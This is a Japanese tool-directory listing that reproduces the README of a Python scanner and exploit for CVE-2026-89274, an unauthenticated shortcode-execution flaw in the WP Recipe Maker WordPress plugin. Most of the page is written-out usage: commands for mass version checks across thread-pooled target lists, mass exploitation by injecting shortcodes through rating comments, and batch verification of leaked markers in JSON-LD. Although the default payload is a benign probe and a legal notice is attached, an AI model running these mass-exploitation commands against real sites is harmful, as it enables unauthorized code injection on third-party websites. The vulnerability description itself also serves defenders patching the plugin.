Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-89274 — Python製のPoCスキャナーおよびエクスプロイト。CVE-2026-89274 は、WP Recipe Maker <=10.8.1 における、レシピ評価コメントと JSON-LD を介した未認証の任意ショートコード実行脆弱性です。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-89274
脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-89274

CVE-2026-89274

Python製のPoCスキャナーおよびエクスプロイト。CVE-2026-89274 は、WP Recipe Maker <=10.8.1 における、レシピ評価コメントと JSON-LD を介した未認証の任意ショートコード実行脆弱性です。

リポジトリを見る
1日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-89274 — WP Recipe Maker 任意ショートコード実行

WP Recipe Maker における CVE-2026-89274 の Python 3 による PoC スキャナ/エクスプロイト。

プラグインwp-recipe-maker
影響を受けるバージョン≤ 10.8.1
修正バージョン10.8.2+
CVSS9.1 (Critical)
認証不要 (コメント投稿)
CWECWE-94

概要

WPRM_Metadata::sanitize_metadata() は、メタデータフィールドに対して strip_shortcodes() の前に do_shortcode() を実行します。承認されたレシピ評価コメント (wprm-comment-rating) は JSON-LD の reviewBody を生成し、注入されたショートコードはレシピページの読み込み時に実行され、構造化データ内で出力が漏洩する可能性があります。

要件: 悪意のあるコメントが承認されている必要があります (自動承認またはモデレーターによる承認)。エクスプロイトモードでは --verify を使用して、マーカーが JSON-LD の reviewBody に現れることを確認できます。

要件

  • Python 3.9+
  • pip install -r requirements.txt

使用方法

root@kitploit:~
pip install -r requirements.txt

# Check plugin version + recipe page with comment rating form
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# Mass exploit from check output (candidates.jsonl)
python poc.py --list candidates.jsonl --mode exploit --threads 20 \
  --shortcode "[caption]PROBE[/caption]" --verify --quiet

# Single-target exploit + JSON-LD verification
python poc.py -u https://target.example --mode exploit \
  --recipe-url /some-post-with-recipe/ \
  --shortcode "[caption]PROBE[/caption]" --verify

# Verify after comment approval (marker from exploit JSON)
python poc.py -u https://target.example --mode verify \
  --recipe-url /some-post-with-recipe/ --marker wprm89274_abc12345

# Batch verify prior submissions (submitted_mass.txt format)
python poc.py --list submitted_mass.txt --mode verify --threads 30 --quiet \
  --output verify_submitted.jsonl --vuln-list verified_leaks.txt

submitted_mass.txt の行フォーマット (verify モード)

root@kitploit:~
https://target.example|https://target.example/recipe-post/|post=123|marker=wprm89274_abc12345

CLI オプション

オプション説明
-u, --url単一ターゲットのベース URL
--listURL リスト、candidates.jsonl、または submitted_mass.txt (verify)
--modecheck、exploit、または verify
--recipe-urlWPRM レシピとコメントが埋め込まれた投稿 URL
--post-idWordPress の comment_post_ID
--recipe-idWPRM レシピ ID (オプションで --use-api)
--shortcodeコメントテキスト内のペイロード (デフォルトはプローブショートコード)
--markerVerify: JSON-LD 内でマーカー部分文字列を検索
--verifyExploit: 送信後に JSON-LD 内の漏洩を確認
--use-apiPremium ユーザー評価 REST パスも試行
--threads, -jマス並列度 (デフォルト 20)
--outputJSONL 結果 (デフォルト cve_2026_89274_results.jsonl)
--vuln-listヒット/漏洩のテキスト出力 (デフォルト hits.txt)
--candidates-listチェックヒットのメタデータ (デフォルト candidates.jsonl)
--quietマス実行時の進捗出力を減らす

出力 (マスチェック)

ファイル内容
cve_2026_89274_results.jsonlターゲットごとの JSON
hits.txt候補ベース URL
candidates.jsonlpage_url、post_id、recipe_id、version

一般的な status 値 (check)

ステータス意味
candidate脆弱なバージョン + wprm-comment-rating を含むレシピページ
plugin_no_recipe_commentsプラグインは存在するが、適切なレシピ/コメントページが見つからない
recipe_no_comment_rating評価コメントフォームのないレシピページ
patchedバージョン ≥ 10.8.2
no_pluginWP Recipe Maker が検出されない

制限事項

  • ショートコードの影響は、インストールされている他のプラグイン/テーマに依存します。無害なプローブ (例: [caption]) を使用してください。
  • 多くの FOFA/リストターゲットはパッチ済みか、公開評価フォームがありません。
  • アーカイブ URL (/blog/、/recipes/) では JSON-LD の漏洩が表示されない場合があります。エクスプロイトはページ検出時に単一レシピのパーマリンクを優先します。
  • --verify は JSON-LD への反映のみを確認し、完全な RCE を確認するものではありません。

リポジトリ構成

root@kitploit:~
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

ローカルスキャンリストと実行アーティファクト (list.txt、*.jsonl、submitted_mass.txt など) は .gitignore に含まれており、コミットしないでください。

法的注意

許可されたセキュリティテストのみを目的としています。適用される法律およびプログラム規則の遵守はあなたの責任です。

ツールをダウンロード